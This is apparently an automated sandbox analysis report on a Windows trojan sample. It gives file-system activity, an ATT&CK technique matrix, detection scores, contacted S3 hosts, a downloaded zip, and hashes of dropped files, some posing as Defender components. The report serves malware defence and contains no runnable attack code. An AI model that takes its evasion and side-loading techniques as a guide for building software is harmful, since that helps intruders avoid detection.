          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe Code function: 0_2_002BB06B GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 0_2_002BB06B
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_041EF148 GetVersion, 7_2_041EF148
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: rundll32.exe, 0000000B.00000002.3506787301.0000000004911000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3506787301.00000000049D1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
          | Credentials | Domains | Default Accounts | 1 Service Execution | 2 Windows Service | 1 DLL Side-Loading | 2 Obfuscated Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 2 Windows Service | 2 Software Packing | Security Account Manager | 45 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 112 Process Injection | 1 Timestomp | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
          | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
          [Behavior graph] ID: 1383277; Sample: WKYC506_2389030007-00901003...; Startdate: 30/01/2024; Architecture: WINDOWS; Score: 76

          Source | Detection | Scanner | Label | Link
          WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | 5% | ReversingLabs | |
          WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | 1% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll | 100% | Joe Sandbox ML | |
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll | 10% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll | 3% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe | 0% | Virustotal | | Browse
          C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpOAV.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpProvider.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpRtp.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MpSvc.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\NisSrv.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe | 0% | ReversingLabs | |
          C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui | 0% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://defaultcontainer/tempfiles/sample.bsdiff | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          http://defaultcontainer/tempfiles/sample.nuspec | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/package/services/metadata/core-properties/ea39ec67dff34a7992442f15ea616f88.p | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.exe | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/bThe | 0% | Virustotal | | Browse
          http://defaultcontainer/lib/net48/Stand.exe | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.txt | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.dll | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.rels | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.shasum | 0% | Avira URL Cloud | safe |
          http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe |
          http://schemas.openxmlformats.or | 0% | Avira URL Cloud | safe |
          https://unitedstates4.ss.wd.microsoft.us | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/cThe | 0% | Virustotal | | Browse
          http://www.zhongyicts.com.cn | 0% | Virustotal | | Browse
          http://defaultcontainer/lib/net48/Stand.txt | 0% | Avira URL Cloud | safe |
          https://unitedstates1.ss.wd.microsoft.us | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.diff | 0% | Avira URL Cloud | safe |
          http://crl.ver) | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/lib/net48/diskres.dll | 0% | Avira URL Cloud | safe |
          https://unitedstates1.ss.wd.microsoft.us | 1% | Virustotal | | Browse
          http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe |
          https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe. | 0% | Avira URL Cloud | safe |
          https://unitedstates4.ss.wd.microsoft.us | 1% | Virustotal | | Browse
          http://defaultcontainer/_rels/.rels | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/lib/net48/Stand_ExecutionStub.exe | 0% | Avira URL Cloud | safe |
          http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/tempfiles/sample.psmdcp | 0% | Avira URL Cloud | safe |
          http://defaultcontainer/Extra.nuspec | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn | 0% | Virustotal | | Browse
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          s3-r-w.sa-east-1.amazonaws.com | 52.95.163.114 | true | false | | high
          b38709202.s3.sa-east-1.amazonaws.com | unknown | unknown | false | | high

          Name | Malicious | Antivirus Detection | Reputation
          https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zip | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                            52.95.163.114 | s3-r-w.sa-east-1.amazonaws.com | United States | | 16509 | AMAZON-02US | false
                                                                            IP
                                                                            127.0.0.1
                                                                            Joe Sandbox version: 39.0.0 Ruby
                                                                            Analysis ID: 1383277
                                                                            Start date and time: 2024-01-30 13:31:34 +01:00
                                                                            Joe Sandbox product: CloudBasic
                                                                            Overall analysis duration: 0h 10m 13s
                                                                            Hypervisor based Inspection enabled: false
                                                                            Report type: full
                                                                            Cookbook file name: default.jbs
                                                                            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name: Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed: 21
                                                                            Number of new started drivers analysed: 0
                                                                            Number of existing processes analysed: 0
                                                                            Number of existing drivers analysed: 0
                                                                            Number of injected processes analysed: 1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode: default
                                                                            Analysis stop reason: Timeout
                                                                            Sample name: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name: WKYC506_2389030007-00901003007010_777380775_.exe
                                                                            Detection: MAL
                                                                            Classification: mal76.rans.troj.evad.winEXE@22/84@1/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 60%
                                                                            HCA Information: Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.216.73.151
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target Stand.exe, PID 6244 because it is empty
                                                                            • Execution Graph export aborted for target Update.exe, PID 1360 because it is empty
                                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            No simulations
                                                                            No context
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):214352
                                                                            Entropy (8bit):6.043733758501481
                                                                            Encrypted:false
                                                                            SSDEEP:3072:wC3HjG5Tg1HlnGEx6s8Pt0TOAsdPgrjnKRKisSNm50i+B5KTedUQqm1FpCShisD:wC3OTg1AExYWCA4PeTKRKiRc5MT1vh
                                                                            MD5:573FA5E140E6B7C6209B546511DD0989
                                                                            SHA1:28BEFE7EF26AE909FEB74AC4A8C9981BED192A93
                                                                            SHA-256:BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
                                                                            SHA-512:6E43E60743207E0C50B42BAAAF0DE71F544B579292F7907360BE0926C56C74D06CAA4E7BC0ABF5AA857400D8A573BF820905F0B9283C26EE5CD2E0E3320736BF
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):9398
                                                                            Entropy (8bit):4.899071819784544
                                                                            Encrypted:false
                                                                            SSDEEP:192:0kJH/0e6Y/WnPqLO0OKcie0lmkLgJsJ+LjtU+J3I:FBf6Yyf09MnkEeAu
                                                                            MD5:1FC6F870588FEF1B38BA900026BE8828
                                                                            SHA1:6075BC55198D9A0D75A4D7DB20B7B2D8AD47A466
                                                                            SHA-256:A24DD47738189CA55A5137A49FD1246418BC1C589A4294B79DFCC4D2A79C9098
                                                                            SHA-512:530A02081ECFBAB6AB59C904874C604263975174626980BFE445371540E999754A2DD204A003D79C8F7E5FF1D5C420E2CB93BF36B527DFBF774638FE923B62D8
                                                                            Malicious:false
                                                                            Preview:// AmMonitoringInstall.mof : mof source for Malware class..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository...//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare WMI class : Malware..////////////////////////////////////////////////////////....[.. Description("Describes malware detected by Forefront Antimalware"): ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance,.. provider("AntimalwareMonitoringProvider"): ToInstance ToSubClass..]..class Malware: SerializableToXml..{.. string SchemaVersion = "1.0.0.0"; // derived from SerializableToXml.. .. [.. Description("Detection time in the Round-Trip Format"): ToInstance ToSubClass, .. read: ToInstance ToSubClass.. ].. string DetectionTime;.. .. [.. Desc
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):21004
                                                                            Entropy (8bit):4.9286194529785705
                                                                            Encrypted:false
                                                                            SSDEEP:192:HMVlF4ajQGgTGB6r+WApyLaNFeRUTqp1CljVU2kplI5NLO060YeVwa6wplCSJddn:YD4cQGgyBV7clIi0JFMSvG4k+
                                                                            MD5:EAA6FC46125F59D04BCBB6122817B41E
                                                                            SHA1:72436F84D76486D2D1F824E6BC0D3BD47D1CB2E7
                                                                            SHA-256:67191020D74AE8400F875238E494AAF5D28EEFEC7EFE1D1D20D2DB068D5E35D6
                                                                            SHA-512:77F7DE790509CEE5D288CE9DAFB3D100E9DB8F343D5D8380E1B0EDC441D3CC0666C8ECF30DE7910FA701A54C62897ACC169F46885AEEC02B78FC1BA91FE07A80
                                                                            Malicious:false
                                                                            Preview:// AmStatusInstall.mof : mof source for Antimalware Status provider..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository..//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare class : AntimalwareHealthStatus..////////////////////////////////////////////////////////..[.. provider("AntimalwareHealthStatusProv"): ToInstance ToSubClass, .. singleton: DisableOverride ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance, .. Description("This is a singleton that represents the Microsoft Antimalware service status"): ToInstance ToSubClass..]..class AntimalwareHealthStatus: ProtectionTechnologyStatus..{.. string SchemaVersion = "1.0.0.1"; // derived from SerializableToXml.... string Name = "Antimalware"; // derived from ProtectionTechnologySta
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2460
                                                                            Entropy (8bit):4.767342366558364
                                                                            Encrypted:false
                                                                            SSDEEP:48:FiDRPfReZei3Q9Cf9haZCX0doQkAvVTIUH9:8Db2V3Q9CFhaZCX0doXAvVTIUH9
                                                                            MD5:6FE3967E8035358D369C83FA72400006
                                                                            SHA1:A2F9F0D1667431185B3E4E74ED47EDB9CF76A2F9
                                                                            SHA-256:29EFFB537FBC7C0CF869E61BFA5262CF7A7301604298E44373A637585C3504C7
                                                                            SHA-512:0C31F1A0E111A918C763AB30EA9BF2E889BEFDE1A63AA8511F5DC11D7D3C48AA1B25F27513881E32C4E22598BA648958D67B10B7221CAF863DEFD17657A28A02
                                                                            Malicious:false
